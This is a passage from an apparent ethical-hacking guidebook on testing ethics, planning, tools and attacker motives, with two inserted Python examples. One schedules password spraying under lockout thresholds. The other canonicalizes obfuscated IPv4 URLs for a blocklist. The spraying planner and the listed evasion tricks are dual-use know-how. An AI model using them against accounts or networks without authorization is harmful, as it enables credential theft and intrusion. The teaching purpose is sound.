If you don't heed the following principles, bad things can happen. I've seen them ignored or forgotten when planning or executing security tests. The results weren't positive; trust me.
Working ethically
The word ethical in this context means working with high professional morals and values. Whether you're performing security tests against your own systems or for someone who has hired you, everything you do must be aboveboard in support of the company's goals. No hidden agendas allowed! This also includes reporting all your findings regardless of whether or not doing so will create political backlash.
Trustworthiness is the ultimate tenet. It's also the best way to get (and keep) people on your side in support of your security program. The misuse of information is absolutely forbidden. That's what the bad guys do. Let them receive a fine or go to prison because of their poor choices. Keep in mind that you can be ethical but not trustworthy and vice versa, along the lines of Edward Snowden.
Respecting privacy
Treat the information you gather with the utmost respect. All information you obtain during your testing, from web application flaws to cleartext e-mail passwords to personally identifiable information (PII) and beyond, must be kept private. Nothing good can come of snooping into confidential corporate information or employees' private lives.
Involve others in your process. Employ a watch-the-watchers system that can help build trust and support for your security assessment projects. Documentation is key, so document, document, document!
Not crashing your systems
One of the biggest mistakes I've seen people make when trying to test their own systems is inadvertently crashing the systems they're trying to keep running. It doesn't happen as much as it used to, given the resiliency of today's systems. However, poor planning and timing can have negative consequences.
Although it's not likely, you can create DoS conditions on your systems when testing. Running too many tests too quickly can cause system lockups, data corruption, reboots, and more. This is especially true when testing websites and applications. I should know: I've done it! Don't rush and assume that a network or specific host can handle the beating that network tools and vulnerability scanners can dish out.
You can even accidentally create an account lockout or a system lockout condition by using vulnerability scanners or by socially engineering someone into changing a password, not realizing the consequences of your actions. Proceed with caution and common sense. Either way, be it you or someone else, these weaknesses still exist, and it's better that you discover them first!
Many vulnerability scanners can control how many tests are performed on a system at the same time. These settings are especially handy when you need to run the tests on production systems during regular business hours. Don't be afraid to throttle back your scans. It will take longer to complete your testing, but it can save you a lot of grief.
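The account-lockout and throttling cautions above can be built into your own test harness rather than left to luck. The following is an added example (my own code, not from the book or from any scanner it names) that schedules password attempts across several accounts so that no account ever sees more than the lockout threshold minus a safety margin inside the lockout window, while also pacing attempts at a fixed rate. The policy numbers (5 failures in 30 minutes), the rate, and the account and password lists are constructed assumptions; the clock is simulated, so the plan can be inspected offline before it is pointed at a real directory.

```python
"""Lockout-aware, rate-limited password-test scheduler (added example, not from the book).

The lockout policy, rate and credential lists below are assumptions chosen to
illustrate the idea. Times are simulated seconds from the start of the run.
"""
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class LockoutPolicy:
    threshold: int          # failed attempts that trigger a lockout
    window_seconds: float   # period over which those failures are counted
    safety_margin: int = 1  # stay this many attempts below the threshold

    @property
    def budget(self) -> int:
        """Attempts allowed per account inside one window."""
        return max(1, self.threshold - self.safety_margin)


def _expire(q, now, window):
    """Drop attempt times that are no longer inside (now - window, now]."""
    while q and now - q[0] >= window:
        q.popleft()


def plan_attempts(accounts, passwords, policy, rate_per_second):
    """Return a list of (time, account, password) tuples.

    Each password is tried against every account before moving to the next
    one ("spraying"), attempts are spaced 1/rate_per_second apart, and an
    account whose window budget is used up is not touched again until its
    oldest attempt has aged out of the window. The clock only moves forward,
    so a delay for one account delays everything after it (safe, if slow).
    """
    gap = 1.0 / rate_per_second
    recent = {account: deque() for account in accounts}   # attempt times per account
    schedule = []
    now = 0.0
    for password in passwords:
        for account in accounts:
            q = recent[account]
            _expire(q, now, policy.window_seconds)
            if len(q) >= policy.budget:
                # wait until the oldest attempt falls outside the window
                now = q[0] + policy.window_seconds
                _expire(q, now, policy.window_seconds)
            schedule.append((now, account, password))
            q.append(now)
            now += gap
    return schedule


def max_attempts_in_window(schedule, window):
    """Largest number of attempts any single account sees in one window.

    Run this over a plan before executing it; the result must stay below
    the lockout threshold.
    """
    per_account = {}
    for t, account, _ in schedule:
        per_account.setdefault(account, []).append(t)
    worst = 0
    for times in per_account.values():
        times.sort()
        for i, t in enumerate(times):
            count = sum(1 for s in times[: i + 1] if s > t - window)
            worst = max(worst, count)
    return worst


if __name__ == "__main__":
    policy = LockoutPolicy(threshold=5, window_seconds=30 * 60)
    plan = plan_attempts(
        ["alice", "bob", "carol"],                       # constructed accounts
        ["Winter2016!", "Spring2016!", "Summer2016!", "Password1", "Welcome1"],
        policy,
        rate_per_second=2,
    )
    for t, account, password in plan:
        print(f"t={t:8.1f}s  {account:6s}  {password}")
    print("worst case per account per window:",
          max_attempts_in_window(plan, policy.window_seconds), "of", policy.threshold)
```

With these numbers the first four passwords go out within six seconds, and the fifth waits a full 30 minutes because every account has spent its budget of four. The margin of one exists because lockout policies count at the boundary of the window inconsistently across products; verify the real threshold and window against the directory's policy before trusting any plan.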
Using the Ethical Hacking Process
Like practically any IT or security project, you need to plan your security testing. It's been said that action without planning is at the root of every failure. Strategic and tactical issues in the ethical hacking process need to be determined and agreed upon. To ensure the success of your efforts, spend time up front planning for any amount of testing, from a simple OS password-cracking test against a few servers to an all-out vulnerability assessment of a web environment.
If you choose to hire a "reformed" hacker to work with you during your testing or to obtain an independent perspective, be careful. I cover the pros and cons, and the do's and don'ts, associated with hiring trusted and not-so-trusted ethical hacking resources in Chapter 19.
Formulating your plan
Getting approval for security testing is essential. Make sure that what you're doing is known and visible, at least to the decision makers. Obtaining sponsorship of the project is the first step. This is how your testing objectives will be defined. Sponsorship could come from your manager, an executive, your client, or even yourself if you're the boss. You need someone to back you up and sign off on your plan. Otherwise, your testing might be called off unexpectedly if someone (including third parties such as cloud service and hosting providers) claims you were never authorized to perform the tests. Even worse, you could get fired or charged with criminal activity; it has happened!
The authorization can be as simple as an internal memo or an e-mail from your boss when you perform these tests on your own systems. If you're testing for a client, have a signed contract stating the client's support and authorization. Get written approval on this sponsorship as soon as possible to ensure that none of your time or effort is wasted. This documentation is your "Get Out of Jail Free" card if anyone such as your Internet Service Provider (ISP), cloud service provider, or related vendor questions what you're doing, or worse, if the authorities come calling. Don't laugh; it wouldn't be the first time it has happened.
One slip can crash your systems, which is not what anyone wants. You need a detailed plan, but that doesn't mean you need volumes of testing procedures to make things overly complex. A well-defined scope includes the following information:
Specific systems to be tested: When selecting systems to test, start with the most critical systems and processes or the ones you suspect are the most vulnerable. For instance, you can test server OS passwords, test an Internet-facing web application, or attempt social engineering via e-mail phishing before drilling down into all your systems.
Risks involved: Have a contingency plan for your ethical hacking process in case something goes awry. What if you're assessing your firewall or web application and you take it down? This can cause system unavailability, which can reduce system performance or employee productivity. Even worse, it might cause loss of data integrity, loss of data itself, and even bad publicity. It'll most certainly tick off a person or two and make you look bad.
Handle social engineering and DoS attacks carefully. Determine how they affect the people and systems you test.
Dates the tests will be performed and your overall timeline: Determining when the tests are performed is something you must think long and hard about. Do you perform tests during normal business hours? How about late at night or early in the morning so that production systems aren't affected? Involve others to make sure they approve of your timing.
You may get pushback and suffer DoS-related consequences, but the best approach is an unlimited attack, where any type of test is possible at any time of day. The bad guys aren't breaking into your systems within a limited scope, so why should you? Some exceptions to this approach are performing all-out DoS attacks, social engineering, and physical security tests.
Whether or not you intend to be detected: One of your goals might be to perform the tests without being detected. For example, you might perform your tests on remote systems or on a remote office, and you might not want the users to be aware of what you're doing. Otherwise, the users or IT staff might catch on to you and be on their best behavior instead of their normal behavior.
Knowledge of the systems you have before you start testing: You don't need extensive knowledge of the systems you're testing, just a basic understanding. This basic understanding helps protect you and the tested systems.
Understanding the systems you're testing shouldn't be difficult if you're hacking your own in-house systems. If you're testing a client's systems, you may have to dig deeper. In fact, I've only had one or two clients ask for a fully blind assessment. Most IT managers and others responsible for security are scared of these assessments, and they can take more time, cost more, and be less effective. Base the type of test you perform on your organization's or client's needs.
Actions you will take when a major vulnerability is discovered: Don't stop after you find one or two security holes. Keep going to see what else you can discover. I'm not saying to keep hacking until the end of time or until you crash all your systems; ain't nobody got time for that! Instead, simply pursue the path you're going down until you just can't hack it any longer (pun intended). If you haven't found any vulnerabilities, you haven't looked hard enough. They're there. If you uncover something big, you need to share that information with the key players (developers, DBAs, IT managers, and so on) as soon as possible to plug the hole before it's exploited.
The specific deliverables: This includes vulnerability scanner reports and your own distilled report outlining the important vulnerabilities to address, along with recommendations and countermeasures to implement.
Selecting tools
As with any project, if you don't have the right tools for your security testing, you will have difficulty accomplishing the task effectively. Having said that, just because you use the right tools doesn't mean that you'll discover all the right vulnerabilities. Experience counts.
Know the limitations of your tools. Many vulnerability scanners generate false positives and false negatives (reporting vulnerabilities that aren't there, or missing ones that are). Others just skip right over vulnerabilities altogether. In certain situations, like when testing web applications, you'll no doubt have to run multiple vulnerability scanners to find all of the vulnerabilities.
Many tools focus on specific tests, and no tool can test for everything. For the same reason that you wouldn't drive a nail with a screwdriver, don't use a port scanner to uncover specific network vulnerabilities. This is why you need a set of specific tools for the task. The more (and better) tools you have, the easier your ethical hacking efforts are.
Make sure you're using the right tool for the task:
To crack passwords, you need cracking tools, such as Ophcrack and Proactive Password Auditor.
For an in-depth analysis of a web application, a web vulnerability scanner (such as Netsparker, Acunetix Web Vulnerability Scanner, or AppSpider) is more appropriate than a network analyzer (such as Wireshark or OmniPeek).
When selecting the right security tool for the task, ask around. Get advice from your colleagues and from other people online via Google, LinkedIn, and Twitter. Hundreds, if not thousands, of tools can be used for your security tests. The following list runs down some of my favorite commercial, freeware, and open source security tools:
Cain & Abel
OmniPeek
Nexpose
Netsparker
Elcomsoft Proactive System Password Recovery
Metasploit
GFI LanGuard
CommView for WiFi
I discuss these tools and many others in Parts II through V when I go into the specific tests. The Appendix contains a more comprehensive listing of these tools for your reference.
The capabilities of many security and hacking tools are often misunderstood. This misunderstanding has cast a negative light on otherwise excellent and legitimate tools. Even government agencies around the world are talking about making them illegal! Part of this misunderstanding is due to the complexity of many security testing tools. Whichever tools you use, familiarize yourself with them before you start using them. That way, you're prepared to use the tools in the ways they're intended to be used. Here are ways to do that:
Read the readme and/or online Help files and FAQs.
Study the user guides.
Use the tools in a lab or test environment.
Watch tutorial videos on YouTube (if you can bear the poor production on most of them).
Consider formal classroom training from the security tool vendor or another third-party training provider, if available.
Look for these characteristics in tools for security testing:
Adequate documentation
Detailed reports on the discovered vulnerabilities, including how they might be exploited and fixed
General industry acceptance
Availability of updates and responsiveness of technical support
High-level reports that can be presented to managers or nontechnical types (This is especially important in today's audit- and compliance-driven world!)
These features can save you a ton of time and effort when you're performing your tests and writing your final reports.
Executing the plan
Good security testing takes persistence. Time and patience are important. Also, be careful when you're performing your ethical hacking tests. A criminal on your network or a seemingly benign employee looking over your shoulder might watch what's going on and use this information against you or your business.
Making sure that no hackers are on your systems before you start isn't practical. Be sure you keep everything as quiet and private as possible. This is especially critical when transmitting and storing your test results. If possible, encrypt any e-mails and files containing sensitive test information, for example via an encrypted Zip file or an encrypted cloud-based file sharing service.
You're now on a reconnaissance mission. Harness as much information as possible about your organization and systems, much like malicious hackers do. Start with a broad view and narrow your focus:
1. Search the Internet for your organization's name, your computer and network system names, and your IP addresses.
Google is a great place to start.
2. Narrow your scope, targeting the specific systems you're testing.
Whether you're assessing physical security structures or web applications, a casual assessment can turn up a lot of information about your systems.
3. Further narrow your focus with a more critical eye. Perform actual scans and other detailed tests to uncover vulnerabilities on your systems.
4. Perform the attacks and exploit any vulnerabilities you find if that's what you choose to do.
Check out Chapters 4 and 5 to find out more information and tips on this process.
Evaluating results
Assess your results to see what you've uncovered, assuming that the vulnerabilities haven't been made obvious before now. This is where knowledge counts. Your skill at evaluating the results and correlating the specific vulnerabilities discovered will get better with practice. You'll end up knowing your systems much better than anyone else. This makes the evaluation process much simpler moving forward.
Submit a formal report to management or to your client, outlining your results and any recommendations you need to share. Keep these parties in the loop to show that your efforts and their money are well spent. Chapter 17 describes the ethical hacking reporting process.
Moving on
When you finish your security tests, you (or your client) still need to implement your recommendations to make sure the systems are secure. Otherwise, all the time, money, and effort spent on ethical hacking goes to waste. Sadly, I see this very scenario fairly often.
Information systems constantly change and become more complex. New security vulnerabilities and exploits are regularly uncovered. Vulnerability scanners get better and better. Security tests are a snapshot of the security posture of your systems. At any time, everything can change, especially after upgrading software, adding computer systems, or applying patches. This underscores the need to update your tools, before each use if possible. Plan to test regularly and consistently (for example, once a month, once a quarter, or biannually). Chapter 19 covers managing security changes as you move forward.
Cracking the Hacker Mindset
In This Chapter
Understanding the enemy
Profiling hackers and malicious users
Understanding why attackers do what they do
Examining how attackers go about their business
Before you start assessing the security of your systems, it's good to know a few things about the people you're up against. Many information security product vendors and other professionals claim that you should protect your systems from the bad guys, both internal and external. But what does this mean? How do you know how these people think and execute their attacks?
Knowing what hackers and malicious users want helps you understand how they work. Understanding how they work helps you to look at your information systems in a whole new way. In this chapter, I describe the challenges you face from the people actually doing the misdeeds as well as their motivations and methods. This understanding better prepares you for your security tests.
What You're Up Against
Thanks to sensationalism in the media, public perception of the hacker has transformed from harmless tinkerer to malicious criminal. Nevertheless, hackers often state that the public misunderstands them, which is mostly true. It's easy to prejudge what you don't understand. Unfortunately, many hacker stereotypes are based on misunderstanding rather than fact, and that misunderstanding fuels a constant debate.
Hackers can be classified by both their abilities and their underlying motivations. Some are skilled, and their motivations are benign; they're merely seeking more knowledge. At the other end of the spectrum, hackers with malicious intent seek some form of personal, political, or economic gain. Unfortunately, the negative aspects of hacking usually overshadow the positive aspects and promote the negative stereotypes.
Historically, hackers hacked for the pursuit of knowledge and the thrill of the challenge. Script kiddies (hacker wannabes with limited skills) aside, traditional hackers are adventurous and innovative thinkers and are always devising new ways to exploit computer vulnerabilities. (For more on script kiddies, see the section "Who Breaks into Computer Systems," later in this chapter.) Hackers see what others often overlook. They have a tremendous amount of "situational awareness." They wonder what would happen if a cable was unplugged, a switch was flipped, or lines of code were changed in a program. These old-school hackers are like Tim "The Toolman" Taylor, Tim Allen's character on the classic sitcom Home Improvement, thinking they can improve electronic and mechanical devices by "rewiring them."
When they were growing up, hackers' rivals were monsters and villains on video game screens. Now hackers see their electronic foes as only that: electronic. Hackers who perform malicious acts don't really think about the fact that human beings are behind the firewalls, wireless networks, and web applications they're attacking. They ignore that their actions often affect those human beings in negative ways, such as jeopardizing their job security and putting their personal safety at risk. Government-backed hacking? Well, that's a different story, as those actors are making calculated decisions to do these things.
On the flip side, odds are good that you have at least a handful of employees, contractors, interns, or consultants who intend to compromise sensitive information on your network for malicious purposes. These people don't hack in the way people normally suppose. Instead, they root around in files on server shares; delve into databases they know they shouldn't be in; and sometimes steal, modify, and delete sensitive information to which they have access. This behavior is often very hard to detect, especially given the widespread belief by management that users can and should be trusted to do the right things. That belief is reinforced if these users passed their criminal background and credit checks before they were hired. Past behavior is often the best predictor of future behavior, but just because someone has a clean record and authorization to access sensitive systems doesn't mean he or she won't do anything bad. Criminal behavior has to start somewhere!
As negative as breaking into computer systems often can be, hackers and researchers play key roles in the advancement of technology. In a world without these people, odds are good that the latest intrusion prevention technology, data loss prevention (DLP), or vulnerability scanning and exploit tools would be different, if they even existed at all. Such a world may not be bad, but technology does keep security professionals employed and keeps the field moving forward. Unfortunately, the technical security solutions can't ward off all malicious attacks and unauthorized use because hackers and (sometimes) malicious users are usually a few steps ahead of the technology designed to protect against their wayward actions.
However you view the stereotypical hacker or malicious user, one thing is certain: Somebody will always try to take down your computer systems and compromise information by poking and prodding where he or she shouldn't, through denial of service (DoS) attacks, or by creating and launching malware. You must take the appropriate steps to protect your systems against this kind of intrusion.
Thinking like the bad guys
Malicious attackers often think and work like thieves, kidnappers, and other organized criminals you hear about in the news every day. The smart ones constantly devise ways to fly under the radar and exploit even the smallest weaknesses that lead them to their target. The following are examples of how hackers and malicious users think and work. This list isn't intended to highlight specific exploits that I cover in this book or tests that I recommend you carry out, but rather to demonstrate the context and approach of a malicious mindset:
Evading an intrusion prevention system by changing their MAC address or IP address every few minutes to get further into a network without being completely blocked
Exploiting a physical security weakness by being aware of offices that have already been cleaned by the cleaning crew and are unoccupied (and thus easy to access with little chance of getting caught), which might be made obvious by, for instance, the fact that the office blinds are opened and the curtains are pulled shut in the early morning
Bypassing web access controls by changing a malicious site's URL to its dotted decimal IP address equivalent and then converting it to hexadecimal for use in the web browser
Using unauthorized software that would otherwise be blocked at the firewall by changing the default TCP port that it runs on
Setting up a wireless "evil twin" near a local Wi-Fi hotspot to entice unsuspecting Internet surfers onto a rogue network where their information can be captured and easily manipulated
Using an overly trusting colleague's user ID and password to gain access to sensitive information that would otherwise be highly improbable to obtain
Unplugging the power cord or Ethernet connection to a networked security camera that monitors access to the computer room or other sensitive areas and subsequently gaining unmonitored network access
Performing SQL injection or password cracking against a website via a neighbor's unprotected wireless network in order to hide the malicious user's own identity
Malicious hackers operate in countless ways, and this list presents only a small number of the techniques hackers may use. IT and security professionals need to think and work this way in order to really dig in and find security vulnerabilities that may not otherwise be uncovered.
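The dotted-decimal-to-hexadecimal trick in the list above works because browsers and libc inet_aton accept several numeric spellings of one IPv4 address (decimal, octal, hex, and fewer than four parts), so a web filter keyed on the string "192.168.0.1" never sees "http://0xC0A80001/". The following is an added example, my own code rather than anything from the book, that normalizes the host of a URL back to canonical dotted decimal before checking it against a blocklist; it goes slightly beyond the list item by handling all the inet_aton spellings, not just hex. The blocklist entries and URLs are constructed.

```python
"""Canonicalize numeric IPv4 hosts so URL-obfuscation tricks still hit the blocklist.

Added example, not from the book. Implements the inet_aton parsing rules that
browsers and libc follow: each dot-separated part may be decimal, octal
(leading 0) or hex (0x), and 1 to 4 parts are allowed, the last part filling
the remaining bytes of the 32-bit address.
"""
import re
from urllib.parse import urlsplit

_PART_RE = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.IGNORECASE)


def _parse_part(part: str) -> int:
    if not _PART_RE.match(part):
        raise ValueError(f"not a numeric address part: {part!r}")
    if part.lower().startswith("0x"):
        return int(part[2:], 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)                 # leading zero means octal, as in inet_aton
    return int(part, 10)


def canonical_ipv4(host: str):
    """Return 'a.b.c.d' for any inet_aton-style spelling, or None if host is not one."""
    parts = host.strip().split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None                         # a DNS name, not a numeric address
    # all but the last part are single bytes; the last fills the remaining bytes
    last_bits = 8 * (5 - len(parts))
    if any(v > 0xFF for v in values[:-1]) or values[-1] >= (1 << last_bits):
        return None
    number = 0
    for v in values[:-1]:
        number = (number << 8) | v
    number = (number << last_bits) | values[-1]
    return ".".join(str((number >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def is_blocked(url: str, blocked_hosts) -> bool:
    """True if the URL's host, after canonicalization, is on the blocklist.

    Both sides are canonicalized, so the blocklist may itself be written in
    any spelling; non-numeric names are compared case-insensitively.
    """
    host = urlsplit(url).hostname
    if host is None:
        return False
    canonical = canonical_ipv4(host) or host.lower()
    return canonical in {canonical_ipv4(h) or h.lower() for h in blocked_hosts}


if __name__ == "__main__":
    blocklist = ["192.168.0.1", "evil.example"]           # constructed entries
    for candidate in ("http://192.168.0.1/", "http://0xC0A80001/login",
                      "http://3232235521/", "http://0300.0250.0.01/",
                      "http://192.168.1/", "http://good.example/"):
        print(f"{candidate:32s} -> {'BLOCKED' if is_blocked(candidate, blocklist) else 'allowed'}")
```

The defensive lesson is the same one the list item teaches from the other side: compare addresses, not strings. A filter that only matches the literal text of a URL is one base conversion away from being bypassed.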
Who Breaks into Computer Systems
Computer hackers have been around for decades. Since the Internet became widely used in the 1990s, the mainstream public has started to hear more and more about hacking. Only a few hackers, such as John Draper (also known as Captain Crunch) and Kevin Mitnick, are really well known. Many more unknown hackers are looking to make a name for themselves. They're the ones you have to look out for.
In a world of black and white, describing the typical hacker is easy. The historical stereotype of a hacker is an antisocial, pimply-faced teenage boy. But the world has many shades of gray and many types of people doing the hacking. Hackers are unique individuals, so an exact profile is hard to outline. The best broad description of hackers is that all hackers aren't equal. Each hacker has his or her own unique motives, methods, and skills. Hacker skill levels fall into three general categories:
Script kiddies: These are computer novices who take advantage of the exploit tools, vulnerability scanners, and documentation available free on the Internet but who don't have any real knowledge of what's really going on behind the scenes. They know just enough to cause you headaches but typically are very sloppy in their actions, leaving all sorts of digital fingerprints behind. Even though these guys are often the stereotypical hackers that you hear about in the news media, they need only minimal skills to carry out their attacks.
Criminal hackers: Often referred to as "crackers," these are skilled criminal experts who write some of the hacking tools, including the scripts and other programs that the script kiddies and security professionals use. These folks also write malware to carry out their exploits from the other side of the world. They can break into networks and computers and cover their tracks. They can even make it look like someone else hacked their victims' systems. Sometimes, people with ill intent may not be doing what's considered "hacking," but nevertheless, they're abusing their privileges or somehow gaining unauthorized access, such as in the 2015 incident involving Major League Baseball's St. Louis Cardinals and Houston Astros. Thus, the media glorifies it all as "hacking."
Advanced hackers are often members of collectives that prefer to remain nameless. These hackers are very secretive and share information with their subordinates (lower-ranked hackers in the collectives) only when they are deemed worthy. Typically, for lower-ranked hackers to be considered worthy, they must possess some unique information or take the gang-like approach and prove themselves through a high-profile hack. These hackers are arguably some of your worst enemies in IT. (Okay, maybe they're not as bad as untrained and careless users, but close.) By understanding criminal hacker behavior, you are simply being proactive: finding problems before they become problems.
Security researchers: These people are highly technical and publicly known security experts who not only monitor and track computer, network, and application vulnerabilities but also write the tools and other code to exploit them. If these guys didn't exist, security professionals wouldn't have much in the way of open source and even certain commercial security testing tools. I follow many of these security researchers on a weekly basis via their blogs, Twitter, and articles, and you should, too. You can review my blog (http://securityonwheels.blogspot.com), and I list other sources that you can benefit from in the Appendix. Following the progress of these security researchers helps you stay up-to-date on both vulnerabilities and the latest and greatest security tools. I list the tools and related resources from various security researchers in the Appendix and throughout the book.
There are good-guy (white hat) and bad-guy (black hat) hackers. Gray hat hackers are a little bit of both. There are also blue-hat hackers, who are invited by software developers to find security flaws in their systems.
I once saw a study from the Black Hat security conference that found that everyday IT professionals even engage in malicious and criminal activity against others. And people wonder why IT doesn't get the respect it deserves! Perhaps this group will evolve into a fourth general category of hackers in the coming years.
Regardless of age and complexion, hackers possess curiosity, bravado, and often very sharp minds.
Perhaps more important than a hacker's skill level is his or her motivation:
Hacktivists try to disseminate political or social messages through their work. A hacktivist wants to raise public awareness of an issue yet wants to remain anonymous. In many situations, these hackers will try to take you down if you express a view that's contrary to theirs. Examples of hacktivism are the websites that were defaced with the Free Kevin messages that promoted freeing Kevin Mitnick from prison for his famous hacking escapades. Other cases of hacktivism include messages about legalizing drugs, protests against the war, protests centered around wealth envy and big corporations, and just about any other social and political issue you can think of.
Cyberterrorists (both organized and unorganized, often backed by government agencies) attack corporate or government computers and public utility infrastructures, such as power grids and air-traffic control towers. They crash critical systems, steal classified data, or expose the personal information of government employees. Countries take the threats these cyberterrorists pose so seriously that many mandate information security controls in crucial industries, such as the power industry, to protect essential systems against these attacks.
Hackers for hire are part of organized crime on the Internet. Many of these hackers hire out themselves or their DoS-creating botnets for money, and lots of it!
Criminal hackers are in the minority, so don't think that you're up against millions of these villains. Like the e-mail spam kings of the world, many of the nefarious acts from members of collectives that prefer to remain nameless are carried out by a small number of criminals. Many other hackers just love to tinker and only seek knowledge of how computer systems work. One of your greatest threats works inside your building and has an access badge to the building and a valid network account, so don't discount the insider threat.
Why They Do It
Hackers hack because they can. Period. Okay, it goes a little deeper than that. Hacking is a casual hobby for some hackers—they hack just to see what they can and can’t break into, usually testing only their own systems. These aren’t the folks I write about in this book. I focus on those hackers who are obsessive about gaining notoriety or defeating computer systems, and those who have criminal intentions.
Many hackers get a kick out of outsmarting corporate and government IT and security administrators. They thrive on making headlines and being notorious. Defeating an entity or possessing knowledge that few other people have makes them feel better about themselves, building their self-esteem. Many of these hackers feed off the instant gratification of exploiting a computer system. They become obsessed with this feeling. Some hackers can’t resist the adrenaline rush they get from breaking into someone else’s systems. Often, the more difficult the job is, the greater the thrill is for hackers.
It’s a bit ironic given their collective tendencies but hackers often promote individualism—or at least the decentralization of information—because many believe that all information should be free. They think their attacks are different from attacks in the real world. Hackers may easily ignore or misunderstand their victims and the consequences of hacking. They don’t think long-term about the choices they’re making today. Many hackers say they don’t intend to harm or profit through their bad deeds, a belief that helps them justify their work. Many don’t look for tangible payoffs. Just proving a point is often a sufficient reward for them. The word sociopath comes to mind.
The knowledge that malicious attackers gain and the self-esteem boost that comes from successful hacking might become an addiction and a way of life. Some attackers want to make your life miserable, and others simply want to be seen or heard. Some common motives are revenge, basic bragging rights, curiosity, boredom, challenge, vandalism, theft for financial gain, sabotage, blackmail, extortion, corporate espionage, and just generally speaking out against “the man.” Hackers regularly cite these motives to explain their behavior, but these motivations tend to be cited more commonly during difficult economic conditions.
Malicious users inside your network may be looking to gain information to help them with personal financial problems, to give them a leg up over a competitor, to seek revenge on their employers, to satisfy their curiosity, or to relieve boredom.
Many business owners and managers—even some network and security administrators—believe that they don’t have anything that a hacker wants or that hackers can’t do much damage if they break in. They’re sorely mistaken. This dismissive kind of thinking helps support the bad guys and promote their objectives. Hackers can compromise a seemingly unimportant system to access the network and use it as a launching pad for attacks on other systems, and many people would be none the wiser because they don’t have the proper controls to prevent and detect malicious use.
Remember that hackers often hack simply because they can. Some hackers go for high-profile systems, but hacking into anyone’s system helps them fit into hacker circles. Hackers exploit many people’s false sense of security and go for almost any system they think they can compromise. Electronic information can be in more than one place at the same time, so if hackers merely copy information from the systems they break into, it’s tough to prove that hackers possess that information and it’s impossible to get it back.
Similarly, hackers know that a simple defaced web page—however easily attacked—is not good for someone else’s business. It often takes a large-scale data breach to get attention; however, hacked sites can often persuade management and other nonbelievers to address information threats and vulnerabilities.
Many recent studies have revealed that most security flaws are very basic in nature. That’s exactly what I see in my information security assessments. I call these basic flaws the low-hanging fruit of the network just waiting to be exploited. Computer breaches continue to get easier to execute yet harder to prevent for several reasons:
Widespread use of networks and Internet connectivity
Anonymity provided by computer systems working over the Internet and often on the internal network (because effective logging, monitoring, and alerting rarely takes place)
Greater number and availability of hacking tools
Large number of open wireless networks that help hackers cover their tracks
Greater complexity of networks and the code bases in the applications and databases being developed today
Computer-savvy children
Unlikeliness that attackers will be investigated or prosecuted if caught
A malicious hacker only needs to find one security hole whereas IT and security professionals and business owners must find and block them all!
Although many attacks go unnoticed or unreported, criminals who are discovered are often not pursued or prosecuted. When they’re caught, hackers often rationalize their services as being altruistic and a benefit to society: They’re merely pointing out vulnerabilities before someone else does. Regardless, if hackers are caught and prosecuted, the “fame and glory” reward system that hackers thrive on is threatened.
The same goes for malicious users. Typically, their criminal activity goes unnoticed, but if they’re caught, the security breach may be kept hush-hush in the name of shareholder value or not wanting to ruffle any customer or business partner feathers.
However, information security and privacy laws and regulations are changing this because in most situations breach notification is required. Sometimes, the person is fired or asked to resign. Although public cases of internal breaches are becoming more common (usually through breach disclosure laws), these cases don’t give a full picture of what’s really taking place in the average organization.
Whether or not they want to, most executives now have to deal with all the state, federal, and international laws and regulations that require notifications of breaches or suspected breaches of sensitive information. This applies to external hacks, internal breaches, and even something as seemingly benign as a lost mobile device or backup tapes. The Appendix contains URLs to the information security and privacy laws and regulations that may affect your business.
Hacking in the name of liberty?
Many hackers exhibit behaviors that contradict their stated purposes—that is, they fight for civil liberties and want to be left alone, while at the same time, they love prying into the business of others and controlling them in any way possible. Many hackers call themselves civil libertarians and claim to support the principles of personal privacy and freedom. However, they contradict their words by intruding on the privacy and property of others. They often steal the property and violate the rights of others, but are willing to go to great lengths to get their own rights back from anyone who threatens them. It’s live and let live gone awry.
The case involving copyrighted materials and the Recording Industry Association of America (RIAA) is a classic example. Hackers have gone to great lengths to prove a point, defacing the websites of organizations that support copyrights and then ending up illegally sharing music and software themselves. Go figure.
Planning and Performing Attacks
Attack styles vary widely:
Some hackers prepare far in advance of an attack. They gather small bits of information and methodically carry out their hacks, as I outline in Chapter 4. These hackers are the most difficult to track.
Other hackers—usually the inexperienced script kiddies—act before they think through the consequences. Such hackers may try, for example, to telnet directly into an organization’s router without hiding their identities. Other hackers may try to launch a DoS attack against a Microsoft Exchange server without first determining the version of Exchange or the patches that are installed. These hackers usually are caught, or at least blocked.
Malicious users are all over the map. Some can be quite savvy based on their knowledge of the network and of how IT and security operates inside the organization. Others go poking and prodding around into systems they shouldn’t be in—or shouldn’t have had access to in the first place—and often do stupid things that lead security or network administrators back to them.
Although the hacker underground is a community, many of the hackers—especially advanced hackers—don’t share information with the crowd. Most hackers do much of their work independently in order to remain anonymous.
Hackers who network with one another often use private message boards, anonymous e-mail addresses, hacker websites, and Internet Relay Chat (IRC). You can log in to many of these sites to see what hackers are doing.
Whatever approach they take, most malicious attackers prey on ignorance. They know the following aspects of real-world security:
The majority of computer systems aren’t managed properly. The computer systems aren’t properly patched, hardened, or monitored. Attackers can often fly below the radar of the average firewall or intrusion prevention system (IPS). This is especially true for malicious users whose actions are often not monitored at all while, at the same time, they have full access to the very environment they can exploit.
Most network and security administrators simply can’t keep up with the deluge of new vulnerabilities and attack methods. These people often have too many tasks to stay on top of and too many other fires to put out. Network and security administrators may also fail to notice or respond to security events because of poor time and goal management. I provide resources on time and goal management for IT and security professionals in the Appendix.
Information systems grow more complex every year. This is yet another reason why overburdened administrators find it difficult to know what’s happening across the wire and on the hard drives of all their systems. Virtualization, cloud services, and mobile devices such as laptops, tablets, and phones are making things exponentially worse.
Time is an attacker’s friend—and it’s almost always on his or her side. By attacking through computers rather than in person, hackers have more control over the timing for their attacks:
Attacks can be carried out slowly, making them hard to detect.
Attacks are frequently carried out after typical business hours, often in the middle of the night, and from home, in the case of malicious users. Defenses are often weaker after hours—with less physical security and less intrusion monitoring—when the typical network administrator (or security guard) is sleeping.
If you want detailed information on how some hackers work or want to keep up with the latest hacker methods, several magazines are worth checking out:
2600—The Hacker Quarterly magazine (www.2600.com)
(IN)SECURE magazine (www.net-security.org/insecuremag.php)
Hackin9 (http://hakin9.org)
PHRACK (www.phrack.org/archives)
